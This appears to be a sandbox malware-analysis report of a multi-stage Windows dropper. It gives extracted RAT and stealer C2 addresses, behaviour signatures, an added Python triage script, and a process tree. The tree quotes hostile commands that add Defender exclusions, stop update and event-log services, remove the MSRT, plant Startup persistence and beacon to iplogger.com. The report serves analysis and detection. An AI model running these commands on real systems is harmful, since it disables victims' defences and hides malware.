Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    28-10-2024 19:01

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

xworm

C2

163.5.215.245:9049

Mutex

r3SLo8kx59hai6gX

aes.plain

Extracted

Family

redline

Botnet

Pizdun

C2

94.142.138.219:20936

Attributes
  • auth_value

    20a1f7fe6575c6613ee7cc5d3025af70

Extracted

Family

agenttesla

Credentials

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Receiving + Grabber v6.0.4

Botnet

NewClient

C2

157.20.182.183:4449

Mutex

fsqshvwapaxdhwtdp

Attributes
  • delay

    1

  • install

    false

  • install_file

    Winup.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AgentTesla

    Agent Tesla is a remote access trojan (RAT) written in Visual Basic .NET.

  • Agenttesla family
  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • Detect Xworm Payload 2 IoCs
  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorpiex (also spelled Phorphiex) is a malware family that infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Redline family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • VenomRAT 1 IoCs

    Detects VenomRAT - JaffaCakes118.

  • Venomrat family
  • Windows security bypass 2 TTPs 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Runs PowerShell (Add-MpPreference) to modify Windows Defender settings by adding exclusions for file extensions, paths and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 41 IoCs
  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 19 IoCs

    sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • NSIS installer 2 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
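
The signature list above names the behaviours but leaves the concrete artifacts buried in the process tree. The following Python is an added example, not part of the sandbox report or of any vendor's rule set: it classifies the command lines the sandbox recorded into those behaviours and extracts what a responder would hunt for on other hosts: the Defender exclusions added with Add-MpPreference, the update and event-log services stopped with sc.exe, the "WindowsUpdate" service created with a binary under C:\ProgramData, the Startup-folder .url shortcut, the removal of KB890830 (the Malicious Software Removal Tool) and the AV process names probed with findstr. The regexes, category names and the service/AV name lists are this example's own assumptions; the sample command lines are copied from the process tree in this report.

```python
"""Classify sandbox-recorded command lines into the defence-evasion and
persistence behaviours listed in the signatures, and extract the artifacts.

Added example, not part of the sandbox report or any vendor's rules: the
regexes, category names and name lists are assumptions of this example."""
import re
from typing import Dict, List, Tuple

# Constructed input: one observed command line per line, copied from the report.
SAMPLE_CMDLINES = r'''
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'build6_unencrypted.exe'
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url" & echo URL="C:\Users\Admin\AppData\Local\EduInno Dynamics\EduCraft.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url" & exit
findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
'''.strip().splitlines()

# Windows Update orchestrator, its repair service, wuauserv, BITS, Delivery Optimization.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
# Process names the sample greps tasklist output for (Webroot, Quick Heal, Avast,
# AVG, Bitdefender, Norton, Sophos). Assumed list for this example.
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui",
                    "bdservicehost", "nswscsvc", "sophoshealth"}

EXCLUSION_RE = re.compile(
    r'-Exclusion(Path|Extension|Process)\s+(.+?)(?=\s+-[A-Za-z]|\s*;|\s*"|$)', re.I)
SC_RE = re.compile(r'\bsc(?:\.exe)?\s+(stop|start|delete|create|config)\s+"?([\w.-]+)"?', re.I)
BINPATH_RE = re.compile(r'binpath=\s*(?:"([^"]+)"|(\S+))', re.I)
STARTUP_URL_RE = re.compile(r'(\\Startup\\[^"]+\.url)', re.I)
URL_TARGET_RE = re.compile(r'URL="([^"]+)"')
MSRT_RE = re.compile(r'\bwusa\b.*/uninstall\b.*/kb:890830', re.I)  # KB890830 is the MSRT
FINDSTR_RE = re.compile(r'\bfindstr\s+(?:/\w+\s+)*"([^"]+)"', re.I)


def _split_values(raw: str) -> List[str]:
    """Expand a PowerShell @(a, b) array and strip quotes from each value."""
    raw = raw.strip()
    if raw.startswith("@(") and raw.endswith(")"):
        raw = raw[2:-1]
    return [v.strip().strip("'\"") for v in raw.split(",") if v.strip()]


def classify(cmdline: str) -> List[Tuple[str, str]]:
    """Return (category, detail) findings for one command line."""
    findings: List[Tuple[str, str]] = []
    if re.search(r"Add-MpPreference", cmdline, re.I):
        for kind, raw in EXCLUSION_RE.findall(cmdline):
            for value in _split_values(raw):
                findings.append((f"defender_exclusion_{kind.lower()}", value))
    for action, name in SC_RE.findall(cmdline):  # chained "sc ... & sc ..." yields several
        action, lname = action.lower(), name.lower()
        if action == "stop" and lname in UPDATE_SERVICES:
            findings.append(("update_service_stopped", name))
        elif action == "stop" and lname == "eventlog":
            findings.append(("eventlog_stopped", name))
        elif action == "create":
            m = BINPATH_RE.search(cmdline)
            binpath = (m.group(1) or m.group(2)) if m else ""
            # A service binary under ProgramData, Users or Temp is the masquerading pattern.
            userland = re.search(r"\\(ProgramData|Users|Temp)\\", binpath, re.I)
            cat = "service_created_from_userland_path" if userland else "service_created"
            findings.append((cat, f"{name} -> {binpath}"))
    m = STARTUP_URL_RE.search(cmdline)
    if m:
        target = URL_TARGET_RE.search(cmdline)
        findings.append(("startup_url_shortcut",
                         f"{m.group(1)} -> {target.group(1) if target else '?'}"))
    if MSRT_RE.search(cmdline):
        findings.append(("msrt_uninstalled", "KB890830"))
    m = FINDSTR_RE.search(cmdline)
    if m:
        hits = sorted(t for t in m.group(1).split() if t.lower() in AV_PROCESS_NAMES)
        if hits:
            findings.append(("security_software_discovery", " ".join(hits)))
    return findings


def summarize(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Aggregate findings over a whole process tree, de-duplicated, first-seen order."""
    out: Dict[str, List[str]] = {}
    for line in cmdlines:
        for cat, detail in classify(line):
            bucket = out.setdefault(cat, [])
            if detail not in bucket:
                bucket.append(detail)
    return out


if __name__ == "__main__":
    for cat, details in summarize(SAMPLE_CMDLINES).items():
        print(cat)
        for d in details:
            print("   ", d)
```

Running it prints one bucket per behaviour; the interesting output for triage is the exclusion list (the whole user profile, ProgramData, %windir%, %TEMP% and every .exe), the five update-related services plus eventlog stopped, and the service named "WindowsUpdate" pointing at C:\ProgramData\Windows11\Updater.exe. Matching on the PowerShell parameter names rather than on a fixed path means the same check also catches variants that exclude a different folder or extension.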

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Executes dropped EXE
    PID:1204
    • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
      "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1908
      • C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'build6_unencrypted.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2148
      • C:\Users\Admin\AppData\Local\Temp\Files\a14.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\a14.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell" –NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\CDCA.tmp\CDCB.tmp\CDDC.ps1
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2312
      • C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c pHash.bat
          4⤵
            PID:340
        • C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild8.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild8.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2972
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "TraderBro770.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
            4⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2980
            • C:\Users\Admin\AppData\Local\Temp\1.exe
              "1.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1720
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1756
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 76
                6⤵
                • Loads dropped DLL
                • Program crash
                PID:1844
            • C:\Users\Admin\AppData\Local\Temp\2.exe
              "2.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2140
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 88
                6⤵
                • Loads dropped DLL
                • Program crash
                PID:2168
            • C:\Users\Admin\AppData\Local\Temp\TraderBro770.exe
              "TraderBro770.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1904
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2056
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 40
                6⤵
                • Loads dropped DLL
                • Program crash
                PID:2496
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2936
        • C:\Users\Admin\AppData\Local\Temp\Files\univ.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1900
        • C:\Users\Admin\AppData\Local\Temp\Files\Updatemmmm.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\Updatemmmm.exe"
          3⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2912
          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2228
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            4⤵
              PID:2808
              • C:\Windows\system32\wusa.exe
                wusa /uninstall /kb:890830 /quiet /norestart
                5⤵
                • Drops file in Windows directory
                PID:1752
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop UsoSvc
              4⤵
              • Launches sc.exe
              PID:1808
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop WaaSMedicSvc
              4⤵
              • Launches sc.exe
              PID:780
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop wuauserv
              4⤵
              • Launches sc.exe
              PID:824
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop bits
              4⤵
              • Launches sc.exe
              PID:688
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop dosvc
              4⤵
              • Launches sc.exe
              PID:2012
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe delete "WindowsUpdate"
              4⤵
              • Launches sc.exe
              PID:2836
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"
              4⤵
              • Launches sc.exe
              PID:928
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop eventlog
              4⤵
              • Launches sc.exe
              PID:2016
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe start "WindowsUpdate"
              4⤵
              • Launches sc.exe
              PID:1988
          • C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe"
            3⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:1584
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c move Attacked Attacked.bat & Attacked.bat
              4⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2408
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                5⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2872
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "wrsa opssvc"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:3012
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                5⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:1464
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2732
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c md 347861
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2784
              • C:\Windows\SysWOW64\findstr.exe
                findstr /V "systemadaptermeetingskenneth" Grow
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2192
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c copy /b ..\Officer + ..\Essays + ..\Cool + ..\Prompt + ..\Itunes G
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1844
              • C:\Users\Admin\AppData\Local\Temp\347861\Councils.pif
                Councils.pif G
                5⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1492
                • C:\Users\Admin\AppData\Local\Temp\347861\RegAsm.exe
                  C:\Users\Admin\AppData\Local\Temp\347861\RegAsm.exe
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:1440
              • C:\Windows\SysWOW64\choice.exe
                choice /d y /t 5
                5⤵
                • System Location Discovery: System Language Discovery
                PID:664
          • C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1500
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:384
          • C:\Users\Admin\AppData\Local\Temp\Files\a.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\a.exe"
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:2360
            • C:\Windows\sysvplervcs.exe
              C:\Windows\sysvplervcs.exe
              4⤵
              • Windows security bypass
              • Executes dropped EXE
              • Windows security modification
              • System Location Discovery: System Language Discovery
              PID:2388
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2892
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2484
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2508
                • C:\Windows\SysWOW64\sc.exe
                  sc stop UsoSvc
                  6⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:1904
                • C:\Windows\SysWOW64\sc.exe
                  sc stop WaaSMedicSvc
                  6⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:1064
                • C:\Windows\SysWOW64\sc.exe
                  sc stop wuauserv
                  6⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2368
                • C:\Windows\SysWOW64\sc.exe
                  sc stop DoSvc
                  6⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:2984
                • C:\Windows\SysWOW64\sc.exe
                  sc stop BITS /wait
                  6⤵
                  • Launches sc.exe
                  • System Location Discovery: System Language Discovery
                  PID:1772
          • C:\Users\Admin\AppData\Local\Temp\Files\connector1.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\connector1.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1956
        • C:\Windows\SysWOW64\cmd.exe
          cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url" & echo URL="C:\Users\Admin\AppData\Local\EduInno Dynamics\EduCraft.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduCraft.url" & exit
          2⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          PID:2664
      • C:\ProgramData\Windows11\Updater.exe
        C:\ProgramData\Windows11\Updater.exe
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1428
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2172
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          2⤵
            PID:2392
            • C:\Windows\system32\wusa.exe
              wusa /uninstall /kb:890830 /quiet /norestart
              3⤵
              • Drops file in Windows directory
              PID:1048
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop UsoSvc
            2⤵
            • Launches sc.exe
            PID:2796
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop WaaSMedicSvc
            2⤵
            • Launches sc.exe
            PID:2280
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop wuauserv
            2⤵
            • Launches sc.exe
            PID:344
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop bits
            2⤵
            • Launches sc.exe
            PID:2520
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop dosvc
            2⤵
            • Launches sc.exe
            PID:2072
          • C:\Windows\system32\conhost.exe
            C:\Windows\system32\conhost.exe
            2⤵
              PID:3048
            • C:\Windows\system32\svchost.exe
              svchost.exe
              2⤵
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2264

          Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            69095754bbe2f08afb39185a7c93a22f

            SHA1

            66bcb5322233051705c1c8fe2038ab4f5999ad85

            SHA256

            fb3e22e570efde1dc185e8f1dd4c8c9099bc77d32970963acad82ee4ae7f66c6

            SHA512

            2e313dcc9177200777ad8412ebd358d67f595514de009482236b08971c8fcb4001dde18aff7e4749858db378990bf5b8356370fc9cec6ca49702a9f0b31e59de

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            f5af5fbd465a80a1ffdef831a9c4ad5a

            SHA1

            f03aa2333fe39f6474a8f35bb3c1d931c11d8532

            SHA256

            4588d1d90900d918044517a7b8c334daf6d877527e185794ea32c54b9a3d4bfb

            SHA512

            3d6d630447a54efdd7f4df519a2b36bdd6d4d90f462b0c9c050388dd606455db5360ba9da4988e93517243bc0e4a9234d9352fd13f9b33b614817b4d7829efa1

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            342B

            MD5

            feaa96b5e88c662e8a5a46b56af545b3

            SHA1

            da608cb2ea0742bbf94fcce440b06369460be2f2

            SHA256

            b1c67cb28f2906c1d18dd6ea17c121dbb91c4499d79b3cec3d958859ef59ed23

            SHA512

            7644a6698d3114f4d2efa9d0da996c6f46b4c4d58bc21e5d7678fce370e598c460476ce1d89eb9c81d25da82f26a26fe6d35f947530f42d8314e306b5ec0de8f

          • C:\Users\Admin\AppData\Local\EduInno Dynamics\EduCraft.scr

            Filesize

            872KB

            MD5

            18ce19b57f43ce0a5af149c96aecc685

            SHA1

            1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

            SHA256

            d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

            SHA512

            a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PLSLTMYI\download[1].htm

            Filesize

            1B

            MD5

            cfcd208495d565ef66e7dff9f98764da

            SHA1

            b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

            SHA256

            5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

            SHA512

            31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

          • C:\Users\Admin\AppData\Local\Temp\1.exe

            Filesize

            284KB

            MD5

            95d5aa97a3c15cee24aad800cc169d2b

            SHA1

            2ace4e384316f6aba1a77fbea5a30d73259760d6

            SHA256

            1a56132c232842530d78edb6d0ce387b98995e2912df0075d74db9b2f9aa3770

            SHA512

            5e024d56d44f1de22e201bc91d4a125bc1d3a6f0ef005d6213a5256decd1ff52a8abb77f2fbaa8304dcdeb21e4f4ed4bd0008858e6a2ab5a04943985ab02ddbe

          • C:\Users\Admin\AppData\Local\Temp\2.exe

            Filesize

            1.1MB

            MD5

            1a2b16c17517d602806431c0744f5f8f

            SHA1

            465e2d6bd37972295cd017f78f35faa07102ab4e

            SHA256

            d52c40b759d5c215ab4090e972038dd6bdcad31c56d72d9a25ed6e76f3f952f1

            SHA512

            a5bf48dcdc3bde33d919f5e65c183d5fb12cb671497d990dcce38f353bf6546aa0dd4d258e6c7e5b735a47c532a405eeecb78d146afce4382c5e72b2ccffc4bd

          • C:\Users\Admin\AppData\Local\Temp\Attacked

            Filesize

            16KB

            MD5

            6ef8c1c2b28c05eaeac6e46b3040e369

            SHA1

            e95b0727b83d7093562ed5605cec43a4ef999d55

            SHA256

            9b49261b378ff83d4deba60b2340d42f374cde941167951600029d9083ba48e7

            SHA512

            9a125ab0f47d9637542d1ec582ede4b0acf547e31756d0989e91fc8b638e37611d8dd6f01c6a11f209ee77a11f2a928163fe7b6a8f28b86d0b79cfe913fa505d

